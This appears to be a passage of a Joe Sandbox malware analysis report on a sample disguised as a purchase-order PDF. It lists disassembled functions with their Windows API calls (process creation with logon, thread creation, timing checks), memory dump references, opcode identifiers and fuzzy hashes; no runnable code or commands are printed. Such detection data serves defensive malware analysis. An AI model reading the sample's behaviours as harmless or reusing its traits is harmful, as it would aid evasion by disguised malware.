                                                                                                                                                                                                                                                                                                            • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                                                                                                                                                            • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                                                                                                                                                                                                            Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 752480666-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                                                                            • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                                                                                                                                                                                            Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                                                                                                                                                            • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                                                                                                                                                                                                            Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                                                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1413079979-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                                                                                                                                                                                            Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 004141A8
                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1803633139-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                                                                            • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                                                                                                                                                                                            Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3275902921-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                                                                                                                                                                                                            Function 004554B5 Relevance: 9.1, APIs: 6, Instructions: 62windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 004554DF
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3691411573-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                                                                            • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                                                                                                                                                                                            Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1814673581-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                                                                            • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                                                                                                                                                                                            Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                                                                            • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                                                                                                                                                                                            Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 372113273-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                                                                            • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
